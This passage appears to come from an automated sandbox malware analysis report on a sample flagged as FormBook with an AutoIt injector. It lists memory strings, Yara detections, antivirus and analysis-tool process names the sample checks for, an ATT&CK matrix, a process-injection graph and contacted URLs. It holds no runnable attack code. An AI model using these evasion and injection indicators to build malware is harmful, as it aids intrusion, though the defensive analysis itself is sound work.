                Source: dmqiuorkt.mp2.exe, 00000012.00000003.2290624750.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2287052991.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" ThenLL`
                Source: dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624835426.000000000105B000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625489878.0000000001072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: dmqiuorkt.mp2, dmqiuorkt.mp2.exe, explorer.exe, 00000020.00000000.3685306357.0000000004480000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3681413016.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000020.00000000.3681413016.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000002.3827677343.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: dmqiuorkt.mp2, 00000007.00000003.1518830857.0000000001015000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624198548.000000000101D000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2238458029.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238029305.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237826667.0000000000DDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.1864447952.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then6w
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1797532272.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797392869.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797445114.00000000016D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" ThenLL
                Source: tdggoffi.bin.7.dr, tdggoffi.bin.0.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1797287899.000000000172F000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796448815.000000000171E000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796850285.0000000001723000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW@bG
                Source: explorer.exe, 00000020.00000000.3681413016.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000002.3827677343.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Thenx
                Source: explorer.exe, 00000020.00000002.3827066101.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3681032717.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanq

                Language, Device and Operating System Detection

                barindex
                Yara detected Autoit Injector
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2 PID: 1212, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2.exe PID: 6808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2.exe PID: 2788, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2.exe PID: 6900, type: MEMORYSTR
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00266694 cpuid 0_2_00266694
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0025FD34
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0026454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0026454A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008AE5F8 GetUserNameW,7_2_008AE5F8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0088BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,7_2_0088BCF2
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_002503BE GetVersionExW,0_2_002503BE
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796813418.00000000017A3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812580300.00000000017A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                Source: dmqiuorkt.mp2.exe, 0000000F.00000002.1812528985.000000000178A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796778234.0000000001787000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796448815.000000000171E000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796704888.0000000001763000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796756582.0000000001778000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796731783.0000000001772000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1805768417.0000000001789000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796647501.0000000001720000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.000000000171A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238224819.0000000000E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796813418.00000000017A3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812580300.00000000017A4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342513121.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262888317.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262539835.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262757418.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262623069.0000000000D51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGUI.exe
                Source: dmqiuorkt.mp2, 00000007.00000002.1627584125.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625028395.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624888422.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624787830.00000000010BF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812557613.0000000001797000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2320622298.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342249958.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                Source: dmqiuorkt.mp2, 00000007.00000002.1627584125.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625028395.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624888422.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624787830.00000000010BF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812557613.0000000001797000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2320622298.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342249958.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2345409248.00000000038A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: dmqiuorkt.mp2.exeBinary or memory string: WIN_81
                Source: dmqiuorkt.mp2.exeBinary or memory string: WIN_XP
                Source: dmqiuorkt.mp2.exe0.7.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: dmqiuorkt.mp2.exeBinary or memory string: WIN_XPe
                Source: dmqiuorkt.mp2.exeBinary or memory string: WIN_VISTA
                Source: dmqiuorkt.mp2.exeBinary or memory string: WIN_7
                Source: dmqiuorkt.mp2.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2345409248.00000000038A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008D2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,7_2_008D2163
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008D1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,7_2_008D1B61
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003B2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_003B2163
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003B1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,15_2_003B1B61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		2
                Valid Accounts                		1
                Native API                		1
                Scripting                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		21
                Input Capture                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory1
                Account Discovery                		Remote Desktop Protocol21
                Input Capture                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts                		2
                Valid Accounts                		2
                Obfuscated Files or Information                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		SteganographyAutomated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Registry Run Keys / Startup Folder                		21
                Access Token Manipulation                		1
                Software Packing                		NTDS27
                System Information Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script512
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets261
                Security Software Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Registry Run Keys / Startup Folder                		1
                Masquerading                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Virtualization/Sandbox Evasion                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron512
                Process Injection                		Network Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1569431 Sample: FX6KTgnipP.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 87 Multi AV Scanner detection for submitted file 2->87 89 Yara detected Autoit Injector 2->89 91 Yara detected FormBook 2->91 93 8 other signatures 2->93 12 FX6KTgnipP.exe 3 29 2->12         started        16 dmqiuorkt.mp2.exe 1 1 2->16         started        18 dmqiuorkt.mp2.exe 2->18         started        process3 file4 79 C:\Users\user\AppData\Local\...\dmqiuorkt.mp2, PE32 12->79 dropped 81 C:\Users\user\AppData\Local\Temp\...\isci.vbe, Unicode 12->81 dropped 115 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->115 20 wscript.exe 1 12->20         started        83 C:\Users\user\...\dmqiuorkt.mp2.exe.exe, PE32 16->83 dropped 117 Found API chain indicative of sandbox detection 16->117 119 Contains functionality to inject code into remote processes 16->119 121 Writes to foreign memory regions 16->121 23 RegSvcs.exe 16->23         started        25 RegSvcs.exe 16->25         started        123 Allocates memory in foreign processes 18->123 125 Injects a PE file into a foreign processes 18->125 27 RegSvcs.exe 18->27         started        29 RegSvcs.exe 18->29         started        signatures5 process6 signatures7 95 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->95 31 cmd.exe 1 20->31         started        33 cmd.exe 1 20->33         started        36 cmd.exe 1 20->36         started        process8 signatures9 38 dmqiuorkt.mp2 1 26 31->38         started        42 conhost.exe 31->42         started        85 Uses ipconfig to lookup or modify the Windows network settings 33->85 44 conhost.exe 33->44         started        46 ipconfig.exe 1 33->46         started        48 conhost.exe 36->48         started        50 ipconfig.exe 1 36->50         started        process10 file11 71 C:\Users\user\AppData\...\dmqiuorkt.mp2.exe, PE32 38->71 dropped 73 C:\Users\user\AppData\Local\...\dmqiuorkt.mp2, PE32 38->73 dropped 75 C:\Users\user\AppData\...\dmqiuorkt.mp2.exe, PE32 38->75 dropped 77 C:\Users\user\AppData\Local\...\tdggoffi.bin, Unicode 38->77 dropped 99 Found API chain indicative of sandbox detection 38->99 101 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 38->101 103 Writes to foreign memory regions 38->103 105 2 other signatures 38->105 52 RegSvcs.exe 38->52         started        55 RegSvcs.exe 38->55         started        signatures12 process13 signatures14 97 Maps a DLL or memory area into another process 52->97 57 dmqiuorkt.mp2.exe 52->57         started        process15 signatures16 107 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 57->107 109 Writes to foreign memory regions 57->109 111 Injects a PE file into a foreign processes 57->111 60 UserAccountControlSettings.exe 57->60         started        63 RegSvcs.exe 57->63         started        65 RegSvcs.exe 57->65         started        process17 signatures18 113 Maps a DLL or memory area into another process 60->113 67 explorer.exe 60->67 injected 69 WerFault.exe 63->69         started        process19

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                FX6KTgnipP.exe71%ReversingLabsWin32.Trojan.Runner

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp20%ReversingLabs
                C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp20%ReversingLabs
                C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe.exe0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0035.t-0009.t-msedge.net
                		13.107.246.63
                		truefalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://wns.windows.com/batexplorer.exe, 00000020.00000000.3696594073.000000000899E000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://www.stacker.com/arizona/phoenixexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000020.00000002.3828546471.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_deexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://excel.office.comexplorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.microexplorer.exe, 00000020.00000002.3831910075.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.3681722704.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.3695089106.00000000082D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.autoitscript.com/autoit3/FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.drfalse
                                        		high
                                        https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(explorer.exe, 00000020.00000000.3699860588.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BD22000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://parade.com/61481/toriavey/where-did-hamburgers-originateexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.msn.com/~Texplorer.exe, 00000020.00000000.3696594073.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://android.notify.windows.com/iOSpexplorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
